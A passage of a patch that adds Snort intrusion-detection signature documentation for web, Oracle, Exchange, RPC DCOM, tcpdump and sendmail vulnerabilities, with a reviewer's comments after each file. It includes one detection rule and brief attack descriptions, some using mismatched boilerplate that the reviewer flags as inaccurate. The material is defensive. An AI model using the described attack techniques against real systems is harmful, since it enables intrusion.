+the "php_ext" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "php_ext" parameter in the "web_statsConfig.php" script 
+used by the "Harpia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Harpia
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
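Review bot: The third paragraph of Detailed Information (validating "the credentials of a client host", escalation to administrator) is generic CGI-authentication boilerplate and does not describe the remote file include via "php_ext" that the first paragraph and the Summary document; Attack Scenarios has the same problem, speaking of supplying credentials rather than a remote URL in the parameter. Both passages should be rewritten for the RFI case so the document matches the rule. Smaller points: "running ona web server" should be "running on a web server", "attackers choosing" needs an apostrophe, "an exploitation attempt has been attempted" is redundant ("that exploitation has been attempted"), and the blank line separating sections is missing after the Sid value, after Affected Systems and after Contributors.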
--- /dev/null
+++ b/doc/signatures/1572.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1572
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
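Review bot: The line "relationships between the victim server and other hosts can be exploited by the attacker." in Detailed Information is not wrapped at the width the rest of the file uses and should be rewrapped. "running ona web server" should read "on a web server" and "attackers choosing" needs an apostrophe. The Summary ("a known vulnerability in a CGI web application") never names the application or script that SID 1572 matches, and both "Rule:" and "Additional References:" are empty, so nothing here distinguishes this event from the other generic CGI entries in the patch; the matched URI and its reference should be added.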
--- /dev/null
+++ b/doc/signatures/964.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+964
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+This event is generated when an attempt is made to retrieve the file
+users.pwd. This file contains user password information.
+
+--
+Affected Systems:
+	Windows 98 using Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=kb;en-us;144190
+
+--
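Review bot: Detailed Information opens with a generic paragraph ("Many known vulnerabilities exist for this platform and the attack scenarios are legion") and only in a second paragraph, which again begins "This event is generated when", states what the rule actually detects: a request for users.pwd. The specific paragraph should lead and the generic one be cut or folded in, and Attack Scenarios ("from simple directory traversal to exploitation of buffer overflow conditions") should be narrowed to the file retrieval this SID covers. Affected Systems lists only "Windows 98 using Microsoft FrontPage Server Extensions"; if the KB article under Additional References scopes it that narrowly, say so, otherwise list the server platforms that ship the extensions. "Rule:" is empty.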
--- /dev/null
+++ b/doc/signatures/2486.txt
@@ -0,0 +1,63 @@
+Rule:
+alert udp $EXTERNAL_NET any -> $HOME_NET 500 (msg:"DOS ISAKMP invalid
+identification payload attempt";  content:"|05|"; offset:16; depth:1;
+byte_test:2,>,4,30; byte_test:2,<,8,30; reference:bugtraq,10004;
+classtype:attempted-dos; sid:2486; rev:1;)
+
+--
+Sid:
+2486
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a denial of service
+(DoS) associated with tcpdump decoding of an isakmp payload.
+
+--
+Impact:
+A successful attack may cause a DoS of the host running tcpdump.
+
+--
+Detailed Information:
+The tcpdump decode of an isakmp packet with an identification payload may be
+susceptible to a DoS attack.  This occurs because the code does not properly
+convert the payload length field from network-to-host byte order. This may
+cause tcpdump to crash when specific values are supplied to the payload length.
+
+--
+Affected Systems:
+Hosts running tcpdump versions 3.8.1 and earlier
+
+--
+Attack Scenarios:
+An attacker can create and send a malformed isakmp packet that may cause
+a host running tcpdump and analyzing the packet to crash.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Bugtraq:
+http://www.securityfocus.com/bid/10004
+
+--
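Review bot: "Additional References" at the end of the hunk is missing the trailing colon that every other section heading in the file carries. The rule body is filled in here, which is good, but Detailed Information should explain what its options test so the reader can relate the rule to the description: content "|05|" at offset 16 with depth 1 matches the byte that, in the ISAKMP header layout, is the next-payload field selecting an Identification payload, and the two byte_test options read the two-byte field at offset 30 and fire when its value is greater than 4 and less than 8, which is the "specific values ... supplied to the payload length" the description alludes to without naming. The spelling "isakmp" in prose should match the "ISAKMP" used in the msg string.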
--- /dev/null
+++ b/doc/signatures/3045.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+3045
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ethereal.
+
+-- 
+Impact: 
+Serious. Denial of Service (DoS).
+
+--
+Detailed Information:
+Ethereal is a multi-platform network protocol analyser capable of
+displaying network data to the user in a graphical user interface.
+
+An error in the processing of access control lists (ACLs) concerning the
+size of the access control entries (ACEs) may lead to a Denial of Service
+(DoS) condition in Ethereal. The ACL parsing routine trusts the size of
+the ACE given in the packet during processing. If a sufficiently large ACL
+structure is supplied combined with a specified ACE size of 0, it is
+possible to cause the DoS condition to occur.
+
+--
+Affected Systems:
+	Ethereal 0.10.7 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to craft packet data containing large NT ACLs, the
+attacker then needs to specify one of the ACEs as having a size of 0.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
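Review bot: The Summary ("a known vulnerability in Ethereal") does not name the affected parsing code, although Detailed Information and Attack Scenarios make clear it is the NT ACL / ACE size handling; the Summary should say so, so this SID can be told apart from other Ethereal events. Both "Rule:" and "Additional References:" are empty while the text gives a precise affected version ("0.10.7 and prior"), so the advisory that version came from should be cited. "None Known" should be "None known." for consistency with the rest of the patch, and several heading and separator lines ("Rule: ", "Sid: ", "-- ") carry trailing whitespace.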
--- /dev/null
+++ b/doc/signatures/659.txt
@@ -0,0 +1,54 @@
+Rule:
+--
+Sid:
+659
+
+--
+Summary:
+This event is generated when a probe is sent to an SMTP server to determine if the decode alias is supported.
+
+--
+Impact:
+Intelligence gathering activity. This event could be an indication of reconnaissance or an actual attempt to overwrite a sensitive file. If the decode alias is present on the SMTP server, an attacker may use it to overwrite files. 
+
+--
+Detailed Information:
+The decode alias was included to allow email to be sent to a username of decode to process the email content through the uudecode program.  A malicious user could attempt to email a uuencoded file that would overwrite an existing sensitive file. 
+
+--
+Affected Systems:
+Older UNIX Sendmail versions (~1990-1996)
+
+--
+Attack Scenarios:
+An attacker can email a uuencoded file to the decode username to overwrite an existing sensitive file.  
+
+--
+Ease of Attack:
+Simple. Send email containing a uuencoded file to the username decode to overwrite an existing sensitive file.
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Remove decode in /etc/aliases.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS32
+
+
+--
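Review bot: Corrective Action ("Remove decode in /etc/aliases.") should say what is being removed, namely the "decode" alias entry that Detailed Information describes as routing mail to uudecode, and should add that the alias database has to be rebuilt after the file is edited, since the change is not effective until then. Formatting: Summary, Impact, Detailed Information and Attack Scenarios are single unwrapped lines far wider than the wrapping used elsewhere in the patch, "Rule:" is immediately followed by "--" with no blank line, Ease of Attack runs straight into its "--" separator with no blank line, and there are two blank lines before the final separator.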
--- /dev/null
+++ b/doc/signatures/2821.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2821
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure obsolete_flavor_definition
+. This procedure is included in
+sys.dbms_repcat_fla_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
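Review bot: As in 2803.txt, the procedure name is split across lines with a stray leading period ("obsolete_flavor_definition" / ". This procedure is included in" / "sys.dbms_repcat_fla_mas."); it should be a single sentence. This file also qualifies the package with the "sys." schema prefix while 2803.txt gives "dbms_repcat_rgt" bare; one convention should be used across the Oracle entries. "Oracle Oracle9i", "None Known" and the missing full stop after "vendor supplied patch" repeat the issues flagged on 2803.txt, and "Additional References:" is again empty.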
--- /dev/null
+++ b/doc/signatures/2247.txt
@@ -0,0 +1,67 @@
+Rule:  
+
+--
+Sid:
+2247
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the Persits AspUpload application.
+
+--
+Impact:
+Information disclosure. Possible retrieval of sensitive system files. 
+Installation of arbitrary files.
+
+--
+Detailed Information:
+Under certain circumstances it is possible to retrieve information from 
+outside the web root of a server using AspUpload by utilizing a 
+directory traversal technique. The same technique can also be used to 
+upload files of the attackers choosing to other areas of the file 
+system.
+
+The vulnerability exists in the sample scripts that accompany the 
+application.
+
+--
+Affected Systems:
+	AspUpload 2.1
+	
+--
+Attack Scenarios:
+The attacker can use a simple directory traversal technique when 
+supplying the filename for upload.
+
+--
+Ease of Attack:
+Simple. NO exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Remove the sample scripts installed by the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/3608
+
+--
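Review bot: "Simple. NO exploit software required." has an emphatic capital "NO"; it should read "No exploit software required." as in the other entries. The line after "AspUpload 2.1" in Affected Systems consists of a lone tab and should be empty, and "Rule:  " carries trailing spaces. "attackers choosing" needs an apostrophe. Detailed Information says the flaw is in the sample scripts that ship with AspUpload, which is the useful detail here and which Corrective Action already acts on; the Summary should mention it too, so the reader knows the event concerns the sample upload script rather than the component itself.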
--- /dev/null
+++ b/doc/signatures/2675.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2675
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure instantiate_offline
+. This procedure is included in
+dbms_repcat_rgt.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
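Review bot: Same template defects as 2803.txt and 2821.txt: the procedure name is split with a stray leading period ("instantiate_offline" / ". This procedure is included in" / "dbms_repcat_rgt."), the vendor is doubled in "Oracle Oracle9i", "None Known" does not match the "None known." used elsewhere, the Corrective Action sentence lacks a full stop, and "Additional References:" is empty. Since 2675, 2803, 2821 and 2784 all describe the same class of dbms_repcat procedure overflow with identical wording, fixing the shared template once and regenerating these files would be less error-prone than patching each copy.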
--- /dev/null
+++ b/doc/signatures/124-1.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+124-1
+
+--
+Summary:
+This event is generated when the pre-processor xlink2state
+detects network traffic that may constitute an attack. Specifically this
+event is generated when an attempt is made to overflow a static buffer
+associated with the extended verb "X-LINK2STATE" in a possible attempt
+to exploit a known vulnerability in Microsoft Exchange Server.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+Microsoft Exchange Servers are able to use extensions to the SMTP
+protocol to help communicate between Exchange servers. The
+"X-Link2State" verb is used to share routing information between
+Exchange servers.
+
+A buffer overflow condition in the processing of this command may
+present an attacker with the opportunity to execute code of their
+choosing on an affected host.
+
+While some of the extended verbs can be disabled easily by an
+Administrator, this particular command cannot. The affected dynamic link
+library (DLL) must be unregistered. Refer to MS05-021 for details on how
+to unregister the DLL.
+
+--
+Affected Systems:
+	Microsoft Exchange Server 2000 sp3
+	Microsoft Exchange Server 2003
+	Microsoft Exchange Server 2003 sp1
+
+--
+Attack Scenarios:
+An attacker can supply a malicious verb request using the "X-Link2State"
+verb to cause a buffer overflow.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+This event will generate events in an environment where the use of
+extended verbs between Exchange servers is commonplace.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Disable the use of the Microsoft SMTP extensions.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
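Review bot: Corrective Action ("Disable the use of the Microsoft SMTP extensions.") contradicts Detailed Information, which states that this particular verb cannot be disabled and that the affected DLL must be unregistered as described in MS05-021; the corrective action should say "Unregister the affected DLL as described in MS05-021" rather than suggest a switch the text says does not exist. MS05-021 is named in the body but "Additional References:" is empty; the bulletin should be listed there. "Rule:" is empty; for a preprocessor-generated event (GID 124) it would help to say so explicitly rather than leave the field blank. False Positives reads "This event will generate events"; "This rule will generate events" is presumably meant.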
--- /dev/null
+++ b/doc/signatures/100000754.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000754
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Free QBoard" application running on a webserver. Access to the file "faq.php" using a remote file being passed as the "qb_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "qb_path" parameter in the "faq.php" script used by the "Free QBoard" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Free QBoard
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
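Review bot: Same problems as 100000673.txt: the third Detailed Information paragraph and the Attack Scenarios section describe credential-validation weaknesses and do not match the remote file include in the "qb_path" parameter of "faq.php" that the rule detects, and should be rewritten for the RFI case. The file also starts with two blank lines before "Rule:", ends with a blank line after the final separator, omits the blank line after the Sid value and after Affected Systems, and carries the "running ona web server", "attackers choosing" and "exploitation attempt has been attempted" wording. Its Summary, Impact and Detailed Information are single unwrapped lines, unlike the wrapped text in most of the patch.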
--- /dev/null
+++ b/doc/signatures/2198.txt
@@ -0,0 +1,59 @@
+Rule:  
+
+--
+Sid:
+2198
+
+--
+Summary:
+This event is generated when an attempt is made to access cvslog.cgi on an internal web server. This may indicate an attempt to exploit a cross-site scripting vulnerability in Mozilla Bonsai 1.3.
+
+--
+Impact:
+Arbitrary code execution, possible session hijack.
+
+--
+Detailed Information:
+Mozilla Bonsai, a CVS query tool, contains an information disclosure vulnerability in cvslog.cgi. An attacker can discover the location of the Mozilla Bonsai application by sending a malformed request to the application, which produces an error. The error message shows the full path of the cvslog.cgi file, providing the attacker with information about the server directory structure.
+
+--
+Affected Systems:
+Any system running Mozilla Bonsai 1.3.
+
+--
+Attack Scenarios:
+An attacker sends an erroneous request to cvslog.cgi on the Bonsai server. The error message returns the full path of the script, allowing the attacker to discover more information about the server directory structure for possible use in later attacks.
+
+--
+Ease of Attack:
+Simple. Proof of concept exists.
+
+--
+False Positives:
+If a legitimate remote user accesses cvslog.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to a newer build of Mozilla Bonsai 1.3.
+
+If you are running Mozilla Bonsai on Debian 3.0, Debian has provided patches at http://security.debian.org/pool/updates/main/b/bonsai/.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/5517
+
+
+--
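Review bot: The descriptive sections disagree about what the vulnerability is: Summary calls it "a cross-site scripting vulnerability in Mozilla Bonsai 1.3", Impact says "Arbitrary code execution, possible session hijack", but Detailed Information and Attack Scenarios describe a path-disclosure leak from an error message. Impact should be reduced to disclosure of the installation path, or, if the XSS claim is right, Detailed Information should describe it; as written the reader cannot tell which issue the Bugtraq reference (bid 5517) covers. "Upgrade to a newer build of Mozilla Bonsai 1.3" is vague; the fixed release should be named. The reference label "Bugtraq" lacks the colon used elsewhere and there are two blank lines before the closing separator.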
--- /dev/null
+++ b/doc/signatures/992.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 992
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
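Review bot: The Summary and Detailed Information never say which request triggers SID 992 (only "a potential weakness on a host running Microsoft IIS"), and with "Rule:" and "Additional References:" both empty the reader cannot tell which sensitive file the Attack Scenarios paragraph ("retrieve a sensitive file containing information on the IIS implementation") refers to; the matched URI and the reference should be added. "Sid: 992" is written on one line whereas every other file puts the number on the line below the heading. Impact "Information gathering possible administrator access." needs punctuation ("Information gathering; possible administrator access."), and "on the host, this may be the prelude" is a comma splice.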
--- /dev/null
+++ b/doc/signatures/2784.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2784
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_update_resolution
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
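Review bot: Same template defects again (see 2803.txt): "drop_update_resolution" is separated from its full stop and from "This procedure is included in dbms_repcat." by line breaks, "Oracle Oracle9i" doubles the vendor, "None Known" is inconsistent with "None known.", the Corrective Action sentence has no full stop, and "Additional References:" is empty.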
--- /dev/null
+++ b/doc/signatures/1357.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1357
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
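Review bot: "Affected Systems:" is completely empty; for an authentication-bypass event the reader needs at least the application or server class the rule targets, and the Summary ("a web server or an application running on that server") gives nothing to go on either. "Rule:" and "Additional References:" are empty as well, so nothing in this file distinguishes SID 1357 from 1572 or the other generic CGI entries in the patch; the matched URI and its reference should be added. "running ona web server" should read "on a web server".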
--- /dev/null
+++ b/doc/signatures/3300.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3300
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
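Review bot: the Attack Scenarios text ("An attacker may make a request for a file with an overly long filename via a network share.") does not match the Detailed Information, which describes a malformed request sent to an RPC port, so one of the two was copied from another entry. "Expoit" in Ease of Attack should be "Exploit". Additional References is empty even though the 2491.txt entry in this same patch cites MS03-026 and CAN-2003-0352 for the same RPC DCOM vulnerability; the same references belong here.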
--- /dev/null
+++ b/doc/signatures/2074.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2074
+
+--
+Summary:
+using the upload.php script.
